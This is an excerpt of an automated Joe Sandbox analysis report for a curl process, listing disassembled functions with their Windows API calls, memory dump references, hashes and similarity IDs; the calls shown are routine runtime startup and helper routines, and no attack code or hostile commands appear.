                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: socket
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 98920635-0
                                                                                                                                                                    • Opcode ID: 0f73ca7de64534dc6d0e863cb0148302622e17dba67591d4297057b40a2af48a
                                                                                                                                                                    • Instruction ID: 16046ba42a3b403b2a163cf76dbd35f8523d038664aa5c6fd3f62b24f9655730
                                                                                                                                                                    • Opcode Fuzzy Hash: 0f73ca7de64534dc6d0e863cb0148302622e17dba67591d4297057b40a2af48a
                                                                                                                                                                    • Instruction Fuzzy Hash: 4A214975A00200DFDB20EF29CC81B9AB7E5FF58311F14892AE99ACB291E731E854CB51
                                                                                                                                                                    Function 002BFD90 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,00000001,?,?,?,002DA609,00000001,00000000), ref: 002BFDD3
                                                                                                                                                                      • Part of subcall function 002CB574: GetModuleFileNameW.KERNEL32(00000000,00367972,00000104,?,00000001,00000000), ref: 002CB606
                                                                                                                                                                      • Part of subcall function 002C412C: ExitProcess.KERNEL32 ref: 002C413B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateExitFileHeapModuleNameProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1715456479-0
                                                                                                                                                                    • Opcode ID: a0d81a2ae0692eac0bd4e1ca4c4022d51b30387cdc5703e43368c3689623149a
                                                                                                                                                                    • Instruction ID: 8c674400c2a0715dc7153940156fa282540d05baa4222bcf7e49401ad3e6c45b
                                                                                                                                                                    • Opcode Fuzzy Hash: a0d81a2ae0692eac0bd4e1ca4c4022d51b30387cdc5703e43368c3689623149a
                                                                                                                                                                    • Instruction Fuzzy Hash: 1301D2316306035AD6612B38AC16FEA336CDB917E0F11423EF901DA1D2EEB09C604A60
                                                                                                                                                                    Function 002C6ABC Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,002C90F2,00000000,?,00000000,00000000,00000000,?,002C5CFA,00000001,000003BC,?,002DA609), ref: 002C6AFB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                    • Opcode ID: 13f9c24980f69313cb953d04b1b1135b157ac8d88b18c22f835de5e5e1ee6c53
                                                                                                                                                                    • Instruction ID: 17ab2b3c27f2632319192e3b946544bdcbbcf23a31381e203feabdd821c61413
                                                                                                                                                                    • Opcode Fuzzy Hash: 13f9c24980f69313cb953d04b1b1135b157ac8d88b18c22f835de5e5e1ee6c53
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A01BC302256269BDB258F25DC09F6B3798EB41764F05C32DE846EB190EA70DC308790
                                                                                                                                                                    Function 002D71B4 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(00000055,?,?,002D605E,?,00000055,0000009C), ref: 002D71CE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DefaultUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3358694519-0
                                                                                                                                                                    • Opcode ID: 0f9efee9ee4dc1cfaf16da40ad01d893542029c22f83fed80e9ec93e72453e6b
                                                                                                                                                                    • Instruction ID: b80a7d8b1cce0e1a1e9206e48b38ac52075fcc7ca8b3ba8924ad6a692ba3be6c
                                                                                                                                                                    • Opcode Fuzzy Hash: 0f9efee9ee4dc1cfaf16da40ad01d893542029c22f83fed80e9ec93e72453e6b
                                                                                                                                                                    • Instruction Fuzzy Hash: C1D0C77241560CBBCB01BFF5FC09856775DEB48315F404402F51D46231E576E9609B61
                                                                                                                                                                    Function 002C35C0 Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 002C5CD2: GetLastError.KERNEL32(00000001,00000000,002BE62F,002BFE17,?,?,002DA609,00000001,00000000), ref: 002C5CD4
                                                                                                                                                                      • Part of subcall function 002C5CD2: GetCurrentThreadId.KERNEL32 ref: 002C5D1E
                                                                                                                                                                      • Part of subcall function 002C5CD2: SetLastError.KERNEL32(00000000,?,002DA609,00000001,00000000), ref: 002C5D36
                                                                                                                                                                    • ExitThread.KERNEL32 ref: 002C35E7
                                                                                                                                                                      • Part of subcall function 002C36C3: LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002C35DD), ref: 002C36DD
                                                                                                                                                                      • Part of subcall function 002C36C3: GetProcAddress.KERNEL32(00000000), ref: 002C36E4
                                                                                                                                                                      • Part of subcall function 002C36C3: EncodePointer.KERNEL32(00000000), ref: 002C36EF
                                                                                                                                                                      • Part of subcall function 002C36C3: DecodePointer.KERNEL32(002C35DD), ref: 002C370A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastPointerThread$AddressCurrentDecodeEncodeExitLibraryLoadProc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3204441827-0
                                                                                                                                                                    • Opcode ID: d633340939a1861664890c028098cc6ab5cc9855d4f2f54f23b4755f4df3818f
                                                                                                                                                                    • Instruction ID: d9b900ec20cd3f7d1570604ece75f034ee9407b1e355197cc464ac4257eff192
                                                                                                                                                                    • Opcode Fuzzy Hash: d633340939a1861664890c028098cc6ab5cc9855d4f2f54f23b4755f4df3818f
                                                                                                                                                                    • Instruction Fuzzy Hash: D3D0A730412F2567C2227B24D909F4D769C6F00345F54471EF500161518F28EFA189D9
                                                                                                                                                                    Function 002C412C Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 002C40F8: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,002C4137,00000000,?,002C9012,000000FF,0000001E,00307E48,00000008,002C8F76,00000000,00000000), ref: 002C4107
                                                                                                                                                                      • Part of subcall function 002C40F8: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 002C4119
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 002C413B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressExitHandleModuleProcProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 75539706-0
                                                                                                                                                                    • Opcode ID: 0ef36571a16df7d3ffbcd614f804a1af4052c182958e84cd1ac2b38ff4d1ae55
                                                                                                                                                                    • Instruction ID: df47b5eae656d53b1f0462de9f9834b95e3aeecb8f0a31883694d2017b68e44c
                                                                                                                                                                    • Opcode Fuzzy Hash: 0ef36571a16df7d3ffbcd614f804a1af4052c182958e84cd1ac2b38ff4d1ae55
                                                                                                                                                                    • Instruction Fuzzy Hash: 16B0923108050CBBDB053F15EC0A9893F29FB00391F408126F90808031DF73ADA29A80
                                                                                                                                                                    Function 001DF140 Relevance: 1.3, APIs: 1, Instructions: 77COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008,?,00000000), ref: 001DF219
                                                                                                                                                                      • Part of subcall function 001DEEF0: InitializeCriticalSectionEx.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 001DEF3B
                                                                                                                                                                      • Part of subcall function 001DEEF0: DeleteCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 001DEF60
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$DeleteErrorInitializeLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4261110781-0
                                                                                                                                                                    • Opcode ID: 30957a4b45c6fcd70b1bae902d41fb76c8c8d1539e32b45f420a1c709defffbd
                                                                                                                                                                    • Instruction ID: 7c3b02d28ae8f6e72753bdbfb2de663ba0550501a4de2618eef0a4168630a1d6
                                                                                                                                                                    • Opcode Fuzzy Hash: 30957a4b45c6fcd70b1bae902d41fb76c8c8d1539e32b45f420a1c709defffbd
                                                                                                                                                                    • Instruction Fuzzy Hash: 622104B16407055BD7209B35EC45B87B7D8AF44311F04443EFA1AC6381EB71E9068B69

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 002C4214 Relevance: 120.9, APIs: 35, Strings: 34, Instructions: 193libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,002C5DF9,002C260F,00307AE0,00000014), ref: 002C4217
                                                                                                                                                                      • Part of subcall function 002D0434: EncodePointer.KERNEL32(002D0400,00307FC8,00000008,002CE908), ref: 002D0439
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002CB82C
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 002CB840
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 002CB853
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 002CB866
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 002CB879
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 002CB88C
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 002CB89F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 002CB8B2
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 002CB8C5
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 002CB8D8
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 002CB8EB
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 002CB8FE
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 002CB911
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 002CB924
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 002CB937
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 002CB94A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 002CB95D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 002CB970
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 002CB983
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 002CB996
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 002CB9A9
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002CB9BC
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 002CB9CF
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 002CB9E2
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 002CB9F5
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 002CBA08
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 002CBA1B
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 002CBA2E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 002CBA41
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 002CBA54
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 002CBA67
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 002CBA7A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleExW), ref: 002CBA8D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandleW), ref: 002CBAA0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
